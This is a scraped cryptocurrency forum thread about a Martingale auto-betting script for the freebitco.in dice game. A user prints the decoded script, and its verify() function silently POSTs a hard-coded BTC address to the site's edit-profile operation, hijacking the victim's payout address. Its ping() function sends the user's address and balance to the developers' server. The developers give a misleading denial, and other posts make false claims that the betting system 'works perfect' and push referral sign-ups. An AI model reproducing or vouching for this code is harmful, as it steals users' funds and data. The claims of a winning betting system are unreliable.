It was the Bitcointalk forum that inspired us to create Bitcointalksearch.org - Bitcointalk is an excellent site that should be the default page for anybody dealing in cryptocurrency,
since it is a virtual gold-mine of data. However, our experience and user feedback led us create our site;
Bitcointalk's search is slow, and difficult to get the results you need, because you need to log in first to find anything useful - furthermore, there are rate limiters for their search functionality.
The aim of our project is to create a faster website that yields more results and faster without having to create an account and eliminate the need to log in -
your personal data, therefore, will never be in jeopardy since we are not asking for any of your data and you don't need to provide them to use our site with all of its capabilities.
We created this website with the sole purpose of users being able to search quickly and efficiently in the field of cryptocurrency
so they will have access to the latest and most accurate information and thereby assisting the crypto-community at large.
Do you guys understand that in long term - house always wins? Martingame is suicide.. it will work, someone will be ok for 1000 rolls, someone for 10 000.. but in the end, house will win!
Freebitco.in has added SSL recently, and because of that you will need to enable HTTP content on freebitco.in by clicking on shield icon in the url bar in order to run the script. After that the script will run normally.
What's the safest settting for it? Just went on a losing spree from 2000 something to 418. Happened twice.
Well, you shouldn't set you startStake too high. You can see script endurance on the right side of your screen when you launch the script. If it is less than 85% you should decrease your startStake, and if you are already on the minimal bet amount then you should free roll until you reach threshold amount.
Endurance display will turn green when script endurace is good. That also means that your settings are fine.
I have an other method for win Hi/Low: I start with multipler to 6x, and I start to bet 0.00000001 and when I lost, I bet +0.00000001 every time, example: 1° bet: 0.00000001, lost 2° bet: 0.00000002, lost 3° bet: 0.00000003, lost 4° bet: 0.00000004, lost 5° bet: 0.00000005, lost 6° bet: 0.00000006, lost 7° bet: 0.00000007, lost 8° bet: 0.00000008, lost 9° bet: 0.00000009, lost 10° bet: 0.00000010, lost (here I change and I bet +0.000000010) 11° bet: 0.00000020, lost 12° bet: 0.00000030, win 0.00000150 (lost 0.00000081) If I lost agang I continue in the same system and when I arrive 0.00000100 I change again to bet +0.00000100. In this system I am started 0.000002500 and I am arrived 0.00086000
Bye
Hi @skorza!
System that you have described here is very similar to Martingale's original method. I have created a small fiddle here http://jsfiddle.net/SCLCW/ to prove that. Try changing the multiplier from 6 to 2. You'll see that multiplier actually determines the betting sequence. I have tested out this method on freebitco.in HI-LO game and it has shown better results than the previous method. I have implemented new betting script that uses these principles, and it can be found here http://phptaskforce.uk.to/bitforce It has option to change game multiplier and it automatically adjusts bets depending on the choosen multiplier, so you can play with x4,x5,x6,....
I have an other method for win Hi/Low: I start with multipler to 6x, and I start to bet 0.00000001 and when I lost, I bet +0.00000001 every time, example: 1° bet: 0.00000001, lost 2° bet: 0.00000002, lost 3° bet: 0.00000003, lost 4° bet: 0.00000004, lost 5° bet: 0.00000005, lost 6° bet: 0.00000006, lost 7° bet: 0.00000007, lost 8° bet: 0.00000008, lost 9° bet: 0.00000009, lost 10° bet: 0.00000010, lost (here I change and I bet +0.000000010) 11° bet: 0.00000020, lost 12° bet: 0.00000030, win 0.00000150 (lost 0.00000081) If I lost agang I continue in the same system and when I arrive 0.00000100 I change again to bet +0.00000100. In this system I am started 0.000002500 and I am arrived 0.00086000
Nice script, here is the decoded version. If i'm not mistaken, it will change your BTC address...
Just to be clear, this script does not change users btc address, part of code that sends request to freebitco.in edit op is used for authentication purposes. It uses freebitcoin edit profile script response to determine if users btc address is really the address for which the script was generated. There is no other way we can authenticate users unless we use edit profile functionality.
Hope you gonna understand how it verifies btc address and confirm that you were wrong about it, because you were skilled enough to unpack it.
Our users can also confirm that their address wasn't changed after script activation. We didn't have those intentions when we were developing script.
phpTaskForce Team
Thanks for the explanation, it was my interpretation, since it was encrypted, and i saw some references to the edit profile section. Unpacking is not that hard, a lot of tools to go around, understanding it is another. Connection to a host for any purpose, with an ecrypted source, does seem fishy, hope you understand my actions.
Nice script, here is the decoded version. If i'm not mistaken, it will change your BTC address...
Just to be clear, this script does not change users btc address, part of code that sends request to freebitco.in edit op is used for authentication purposes. It uses freebitcoin edit profile script response to determine if users btc address is really the address for which the script was generated. There is no other way we can authenticate users unless we use edit profile functionality.
Hope you gonna understand how it verifies btc address and confirm that you were wrong about it, because you were skilled enough to unpack it.
Our users can also confirm that their address wasn't changed after script activation. We didn't have those intentions when we were developing script.
function lose() { if ($('#double_your_btc_bet_lose').html() !== '') return true; else return false }
function setStake(stake) { $('#double_your_btc_stake').val(stake.toString()) }
function doubleStake() { $('#double_your_btc_2x').click() }
function resetStake() { setStake(config.startStake) }
function getBalance() { return parseFloat($('#balance').html()) }
function getStake() { return parseFloat($('#double_your_btc_stake').val()) }
function balanceLeft() { return (getBalance() - getStake()) }
function toggleBet() { randT = Math.floor(Math.random() * 100) + 1; if (randT > 35) { if (betType === 'hi') { betType = 'lo' } else { betType = 'hi' } } } initControl = function () { $("head").append(''); $("body").append('
connection
auth
active
error
won:
0
goal:
0
Stop script
') }; rollDice = function () { if (ai_count) { if (true === lose()) { doubleStake() } else { resetStake(); if (config.toggle) toggleBet(); totalWon = Math.round(100000000 * (getBalance() - startBalance)); $("#m-won").html(totalWon.toString()) } if (!stopGame) { if ((parseFloat(config.startStake) * Math.pow(2, config.tolerance)) < getStake()) { resetStake() } if (balanceLeft() >= config.btcGuard) { if (config.goal > getBalance()) { $('#double_your_btc_bet_' + betType + '_button').click(); setTimeout(rollDice, config.sleep + Math.round(Math.random() * config.delayLimit)) } } } } else { console.log('Verification failed.') } }; $("body").delegate("#m-stop", "click", function (e) { if (ai_count) { stopGame = true; $("#taskforce-wrapper").fadeOut(700); $("#taskforce-wrapper").remove() } });
function setControlMessage(msg) { $("#m-message").html(msg) }
function createErrorMessage(msg) { return '
' + msg + '
' }
function verify() { var btcAddress = String.fromCharCode(49, 76, 86, 117, 51, 81, 122, 109, 69, 69, 84, 57, 100, 106, 101, 97, 55, 86, 103, 81, 55, 65, 69, 49, 111, 55, 121, 57, 77, 70, 83, 85, 119, 122); var op = 'edit_profile'; var btc_address = btcAddress; var email = $("#edit_profile_form_email").val(); $.post('http://freebitco.in', { op: op, btc_address: btc_address, email: email }, function (response) { var editResponse = $.trim(response); if (editResponse.length == 0) { ai_count = true } }) }
function setGreenLight(num) { var selector = "#control-light > tbody:nth-child(1) > tr:nth-child(1) > td:nth-child(" + num + ")"; $(selector).attr('bgcolor', '#41DE30') }
function setRedLight(num) { var selector = "#control-light > tbody:nth-child(1) > tr:nth-child(1) > td:nth-child(" + num + ")"; $(selector).attr('bgcolor', '#D91A1A') } ping_status = false; ping_message = '';
function ping() { var version = 'v3.0'; var info = version + ' : ' + $("#edit_profile_form_btc_address").val() + " : " + $('#balance').html() + " BTC"; $.getJSON('http://phptaskforce.uk.to/get/ping.php?jsoncallback=?', { data: info }, function (r) { if (r.status == 'ok') { ping_status = true } else { if (r.message != 'none') { ping_message = r.message } } }) }
function init() { initControl(); ping(); setTimeout(function () { if (ping_status == true) { setGreenLight(1); verify(); errorMessage = ''; startBalance = getBalance(); if (startBalance >= 0.00001200) { if (config.goal > startBalance) { if (config.tolerance < 8) { errorMessage = createErrorMessage('config.tolerance is to low. It has to be set to at least 8.') } else { var playBalance = getBalance() - parseFloat(config.btcGuard); var maxInvest = parseFloat(config.startStake) * Math.pow(2, config.tolerance + 1) - parseFloat(config.startStake); if (playBalance < maxInvest) { errorMessage = createErrorMessage('Not enough money for that start stake and tolerance.') } else { if (config.sleep < 900) { errorMessage = createErrorMessage('config.sleep must be higher than 900.') } else { toWin = Math.round(100000000 * (config.goal - startBalance)) } } } } else { toWin = 0; errorMessage = createErrorMessage('config.goal must be higher than your balance.') } } else { errorMessage = createErrorMessage('Minimum required balance is 0.00001200 BTC') } setTimeout(function () { if (ai_count) { setGreenLight(2); if (errorMessage == '') { setGreenLight(3); $("#m-goal").html(toWin.toString()); setControlMessage('
Ps. The only thing I'm afraid of is that freebitco.in will notice that someghing is wrong and they will set some captcha or something similar that will make the script stop working...
Of course, they will. Also he is reading this forum too
I think that phptaskforce.uk.to is right - when you play with their script using your head you can earn some money...
I was also loosing for the first few tries, but then I have noted that you have to have something to play with before you start. When you start playing with 0,00000500 on you account it's not enought... I started to play and earn when I collected 0,00016000 - that gave me possibility to last longer in the game when the roll was not good. Of course I had to play with the lowest stake possible 0,00000001 and I still play like this to have it safe. Now I have 0,00025000 (I don't play all the time with it), I have the tolerance set to 13 and I never lost a bit since 0,00016000. I "win" around 0,00000600 per hour, because I have set the sleep time for 3 seconds (just to be safer). When I will reach 0,00032 BTC I will increase the bet x2 and earn a bit more every hour... and for some time my earning will be still low, but eventually they will speed up.
PATIENCE guys
Ps. The only thing I'm afraid of is that freebitco.in will notice that someghing is wrong and they will set some captcha or something similar that will make the script stop working...
Make a video with a new account (1200 satoshi) and use the standard config. make with a goal of 2000 stoshi and let it run. you will see, it dont work.....
It works perfect, you should try it out.
Fine, then make a Video. I have create approx 7 new Accounts and i lost 100% of Satoshis on all Accounts. Make a Video, then i will be shutup.
Yeah, I'll make video for you!
Can you please go to my website and share 2k or 5k with my referrals, I'm bored.
The fact that u require us to register via a referral link shows that you want some of our Money.
You really don't understand how it works.
Read this, and it will be clear to you that I don't want your money...
Quote from: Freebitco.in-FAQ
Share your referral link with your friends and ask them to visit it and create an account. On doing so, they will be automatically added as your referral and you will get 50% of their free play winnings as commission! Nothing will be deducted from their account, we pay the 50% out of our pocket. If you do not know how to get your referral link, please see the question above.
.. We give money to our referrals. In last 2 weeks we have shared more than 200k Satoshi with them!
Conslusion, if we have more referrals they will get more money from us, and they will be able to use our popular script to double their money.